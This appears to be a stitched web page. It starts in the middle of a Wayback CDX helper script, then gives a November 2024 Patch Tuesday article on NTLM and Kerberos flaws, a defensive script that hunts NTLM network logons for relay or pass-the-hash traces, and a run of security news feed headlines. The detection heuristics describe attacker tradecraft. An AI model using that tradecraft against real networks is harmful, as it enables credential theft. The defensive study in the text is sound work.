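    """Capture nearest in time to `when`; by default only HTTP 200 captures."""
    best, best_delta = None, None
    for c in captures:
        if ok_only and c["statuscode"] != "200":
            continue
        delta = abs(to_datetime(c["timestamp"]) - when)
        if best is None or delta < best_delta:
            best, best_delta = c, delta
    return best


def changed_captures(captures):
    """Captures whose content digest differs from the previous one, i.e. the
    points at which the page actually changed (same idea as CDX collapse=digest)."""
    out, prev = [], None
    for c in sorted(captures, key=lambda c: c["timestamp"]):
        if c["digest"] != prev:
            out.append(c)
        prev = c["digest"]
    return out


# CONSTRUCTED sample CDX response for a hypothetical pricing page.
SAMPLE_CDX_JSON = json.dumps([
    ["timestamp", "original", "statuscode", "digest"],
    ["20240901120000", "https://example.com/pricing", "200", "AAAA1111"],
    ["20240915120000", "https://example.com/pricing", "200", "AAAA1111"],
    ["20240924045754", "https://example.com/pricing", "200", "BBBB2222"],
    ["20241001120000", "https://example.com/pricing", "404", "CCCC3333"],
])

if __name__ == "__main__":
    when, url = parse_snapshot_url(f"{WAYBACK}/web/20240924045754/https://www.kaspersky.com/blog")
    print(when.isoformat(), url)
    print(cdx_query_url("https://example.com/pricing", start=to_datetime("202409")))
    caps = parse_cdx_json(SAMPLE_CDX_JSON)
    for c in changed_captures(caps):
        print("changed:", snapshot_url(c["original"], to_datetime(c["timestamp"])))
```

Fetching `cdx_query_url(...)` with any HTTP client and feeding the body to `parse_cdx_json` gives the real capture list; `changed_captures` then answers "when did this page change" without opening every snapshot, which is what matters when you are documenting an edited news report or a quietly changed product page. The `raw=True` (`id_`) link is the one to hash or diff, since the toolbar-wrapped version is rewritten by the archive.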


 Security Tools

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November’s patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine. Microsoft credits Google’s Threat Analysis Group with reporting the flaw.

The second bug fixed this month that is already seeing in-the-wild exploitation is CVE-2024-43451, a spoofing flaw that could reveal Net-NTLMv2 hashes, which are used for authentication in Windows environments. Satnam Narang, senior staff research engineer at Tenable, says the danger with stolen NTLM hashes is that they enable so-called “pass-the-hash” attacks, which let an attacker masquerade as a legitimate user without ever having to log in or know the user’s password. Narang notes that CVE-2024-43451 is the third NTLM zero-day so far this year. “Attackers continue to be adamant about discovering and exploiting zero-day vulnerabilities that can disclose NTLMv2 hashes, as they can be used to authenticate to systems and potentially move laterally within a network to access other systems,” Narang said.

The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server.

Ben McCarthy, lead cybersecurity engineer at Immersive Labs, called special attention to CVE-2024-43602, a remote code execution vulnerability in Windows Kerberos, the authentication protocol that is heavily used in Windows domain networks. “This is one of the most threatening CVEs from this patch release,” McCarthy said. “Windows domains are used in the majority of enterprise networks, and by taking advantage of a cryptographic protocol vulnerability, an attacker can perform privileged acts on a remote machine within the network, potentially giving them eventual access to the domain controller, which is the goal for many attackers when attacking a domain.”

McCarthy also pointed to CVE-2024-43498, a remote code execution flaw in .NET and Visual Studio that could be used to install malware. This bug has earned a CVSS severity rating of 9.8 (10 is the worst).

Finally, at least 29 of the updates released today tackle memory-related security issues involving SQL Server, each of which earned a threat score of 8.8. Any one of these bugs could be used to install malware if an authenticated user connects to a malicious or hacked SQL database server.

For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list. For administrators in charge of managing larger Windows environments, it pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users. As always, if you experience any problems applying any of these updates, consider dropping a note about it in the comments; chances are excellent that someone else reading here has experienced the same issue, and maybe even has found a solution.
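One practical caveat on the NTLM passage above: what CVE-2024-43451-style bugs leak is a Net-NTLMv2 challenge-response, which an attacker relays to another service or cracks offline rather than "passing" like a stored NT hash; either way, the abuse shows up on the victim network as NTLM network logons that Kerberos-only environments should not be producing. The block below is an added example, not code from the Krebs article: a small hunt over exported Windows Security event 4624 records (fields `LogonType`, `AuthenticationPackageName`, `LmPackageName`, `IpAddress`, `WorkstationName` are the real event fields) that surfaces NTLM network logons and tags the ones worth a look. The CSV rows are constructed sample data, the internal address ranges are an assumed RFC 1918 baseline, and the empty-workstation-name signal is a heuristic, labelled as such.

```python
# Added example (not from the Krebs article): hunt for NTLM network logons in
# an export of Windows Security event 4624, the on-target footprint of relayed
# or cracked Net-NTLMv2 material. SAMPLE_EVENTS_CSV is CONSTRUCTED data;
# INTERNAL_NETS is an ASSUMED baseline; the workstation-name rule is a heuristic.
import csv
import io
from collections import Counter
from ipaddress import ip_address, ip_network

SAMPLE_EVENTS_CSV = """\
EventID,TimeCreated,TargetUserName,TargetDomainName,LogonType,AuthenticationPackageName,LmPackageName,IpAddress,WorkstationName
4624,2024-11-12T09:01:10Z,svc_backup,CORP,3,NTLM,NTLM V2,10.20.30.40,FILESRV01
4624,2024-11-12T09:02:15Z,jdoe,CORP,3,Kerberos,-,10.20.30.41,WS-JDOE
4624,2024-11-12T09:03:20Z,jdoe,CORP,3,NTLM,NTLM V2,203.0.113.7,-
4624,2024-11-12T09:04:00Z,administrator,CORP,3,NTLM,NTLM V1,10.20.30.99,-
4624,2024-11-12T09:05:30Z,jdoe,CORP,2,NTLM,NTLM V2,127.0.0.1,WS-JDOE
4624,2024-11-12T09:06:45Z,svc_backup,CORP,3,NTLM,NTLM V2,10.20.30.40,FILESRV01
"""

# Assumed "inside" ranges; replace with the real address plan.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]


def _is_internal(ip):
    """True for loopback/RFC 1918 sources and for placeholder values like '-'."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return True
    return addr.is_loopback or any(addr in net for net in INTERNAL_NETS)


def ntlm_network_logons(csv_text):
    """Return 4624 rows that are NTLM network logons (LogonType 3), each with
    the list of reasons that make it worth a closer look (empty = unremarkable)."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventID"] != "4624" or row["LogonType"] != "3":
            continue
        if row["AuthenticationPackageName"] != "NTLM":
            continue
        reasons = []
        if row["LmPackageName"] == "NTLM V1":
            reasons.append("NTLMv1 (weak, should be disabled)")
        if not _is_internal(row["IpAddress"]):
            reasons.append("source outside internal ranges")
        if row["WorkstationName"] in ("", "-"):
            reasons.append("no workstation name (heuristic: seen with relay tooling)")
        if row["TargetUserName"].lower() == "administrator":
            reasons.append("built-in Administrator over NTLM")
        findings.append({"time": row["TimeCreated"], "user": row["TargetUserName"],
                         "source": row["IpAddress"], "lm": row["LmPackageName"],
                         "reasons": reasons})
    return findings


def suspicious(findings):
    """Only the findings that carry at least one reason."""
    return [f for f in findings if f["reasons"]]


def by_source(findings):
    """NTLM network logons per source address, for baselining known users of NTLM."""
    return Counter(f["source"] for f in findings)


if __name__ == "__main__":
    found = ntlm_network_logons(SAMPLE_EVENTS_CSV)
    for f in suspicious(found):
        print(f["time"], f["user"], f["source"], f["lm"], "; ".join(f["reasons"]))
    print(by_source(found))
```

On a real export, `by_source` gives the short list of hosts and service accounts that legitimately still speak NTLM; everything else that `suspicious` returns, and in particular any NTLMv1 or any NTLM logon from outside the address plan, is where to start after applying this month's fixes, alongside enforcing SMB and LDAP signing so that a leaked challenge-response cannot be relayed.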


 Feed

The November 2024 Patch Tuesday update contains a substantially high percentage of remote code execution (RCE) vulnerabilities (including a critical issue in Windows Kerberos), and two other zero-day bugs that have been previously disclosed and could soon come under attack.

 Feed

Ubuntu Security Notice 7102-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.40 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, and Ubuntu 24.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

 Feed

Debian Linux Security Advisory 5810-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

 Feed

Debian Linux Security Advisory 5811-1 - An out-of-bounds write vulnerability when handling crafted streams was discovered in mpg123, a real time MPEG 1.0/2.0/2.5 audio player/decoder for layers 1, 2 and 3, which could result in the execution of arbitrary code.

 Feed

Debian Linux Security Advisory 5809-1 - Multiple vulnerabilities have been found in the Symfony PHP framework which could lead to privilege escalation, information disclosure, incorrect validation or an open redirect.

 Feed

Red Hat Security Advisory 2024-9092-03 - An update for freerdp is now available for Red Hat Enterprise Linux 9. Issues addressed include heap overflow, integer overflow, and out of bounds read vulnerabilities.

 Feed

Cybersecurity researchers have disclosed new security flaws impacting Citrix Virtual Apps and Desktops that could be exploited to achieve unauthenticated remote code execution (RCE). The issue, per findings from watchTowr, is rooted in the Session Recording component that allows system administrators to capture user activity, and record keyboard and mouse input, along with a video stream of the

 Feed

Cybersecurity researchers are calling attention to a new sophisticated tool called GoIssue that can be used to send phishing messages at scale targeting GitHub users. The program, first marketed by a threat actor named cyberdluffy (aka Cyber D' Luffy) on the Runion forum earlier this August, is advertised as a tool that allows criminal actors to extract email addresses from public GitHub

 Feed

Threat actors with ties to the Democratic People's Republic of Korea (DPRK aka North Korea) have been found embedding malware within Flutter applications, marking the first time this tactic has been adopted by the adversary to infect Apple macOS devices. Jamf Threat Labs, which made the discovery based on artifacts uploaded to the VirusTotal platform earlier this month, said the Flutter-built

 Feed

Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more

 Feed

Cybersecurity researchers have flagged a new ransomware family called Ymir that was deployed in an attack two days after systems were compromised by a stealer malware called RustyStealer. "Ymir ransomware introduces a unique combination of technical features and tactics that enhance its effectiveness," Russian cybersecurity vendor Kaspersky said. "Threat actors leveraged an unconventional blend

 Guest blog

Scammers have leapt at the opportunity to exploit vulnerable UK residents by sending bogus messages telling them they need to take action to receive help with their winter heating bills. Read more in my article on the Tripwire State of Security blog.

 AI

In episode 24 of The AI Fix, Mark makes an unforgivable error about the Terminator franchise, our hosts wonder if a "seductive" government chatbot will make it easier to talk about tax, a radio station abandons its three month AI experiment after a week, and OpenAI parks its tanks on Google’s lawn. Graham gets cosmic and wonders why we aren’t surrounded by advanced alien AIs, our hosts argue about whether the moon landings or the invention of the cheese sandwich were more consequential events in human history, and Mark tells Graham that artificial superintelligence is just around the corner. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

 Cyber Security News

The post FBI Warns US Organizations of Fake Emergency Data Requests Made by Cybercriminals – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 cost

The post Cyberattack Cost Oil Giant Halliburton $35 Million – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Debt Relief Firm Forth Discloses Data Breach Impacting 1.5 Million People – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Veeam Patches High-Severity Vulnerability as Exploitation of Previous Flaw Expands – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Law Firm Data Breach Impacts 300,000 Presbyterian Healthcare Patients – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Many Legacy D-Link NAS Devices Exposed to Remote Attacks via Critical Flaw – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Palo Alto Networks Addresses Remote Code Execution Vulnerability Claims – Source: www.securityweek.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 credit card

The post 200,000 SelectBlinds customers have their card details skimmed in malware attack – Source: www.bitdefender.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

The post Building a Resilient Network Architecture: Key Trends for 2025 – Source: levelblue.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post News alert: Sweet Security rolls out its advanced runtime detection and response platform for AWS – Source: www.lastwatchdog.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post MY TAKE: Technology breakthroughs, emerging standards are coalescing to assure IoT integrity – Source: www.lastwatchdog.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 avast secureline vpn

The post Avast SecureLine VPN Review 2024: Is It a Good VPN for You? – Source: www.techrepublic.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post FBI issues warning as crooks ramp up emergency data request scams – Source: go.theregister.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Crypto

The post Dark web crypto laundering kingpin sentenced to 12.5 years in prison – Source: go.theregister.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Blog

The post 6 Things to Know About Improving Threat Intelligence Collection – Source: securityboulevard.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post DEF CON 32 – Outlook Unleashing RCE Chaos CVE-2024-30103 – Source: securityboulevard.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace – Source: securityboulevard.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 America's Closest Ally

The post Canada Remembrance Day 2024 / Jour du Souvenir du Canada 2024 – Source: securityboulevard.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cloud Security

The post 13 essential enterprise security tools — and 10 nice-to-haves – Source: www.csoonline.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 0CISO2CISO

Source: www.csoonline.com – Introduced in 2021, the US government’s vulnerability disclosure policy platform has racked up 12,000 bug reports and saved the government millions in remediation costs. CISA’s vulnerability disclosure policy (VDP) platform grew to encompass 51 US government agencies and 12,000 bug reports in its first two years. Experts say increased bug bounties, […] The post CISA’s VDP is going gangbusters but could still be improved – Source: www.csoonline.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

The post How to prevent AI-assisted data incidents (original title: So verhindern Sie KI-gestützte Datenvorfälle) – Source: www.csoonline.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

The post BlackBerry Cylance customers should ‘explore options’ now that its immediate future is vague: Expert – Source: www.csoonline.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

The post Compensation for damages after data theft at Facebook? (original title: Schadenersatz nach Datendiebstahl bei Facebook?) – Source: www.csoonline.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Energy Giant Halliburton Reveals $35m Ransomware Loss – Source: www.infosecurity-magazine.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post WEF Introduces Framework to Strengthen Anti-Cybercrime Partnerships – Source: www.infosecurity-magazine.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post New Remcos RAT Variant Targets Windows Users Via Phishing – Source: www.infosecurity-magazine.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Microsoft Visio Files Used in Sophisticated Phishing Attacks – Source: www.infosecurity-magazine.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 backdoors

The post Criminals Exploiting FBI Emergency Data Requests – Source: www.schneier.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The post Malicious Python Package Exfiltrates AWS Credentials – Source: www.govinfosecurity.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

Aggregator history: 2024-11, Tuesday, November 12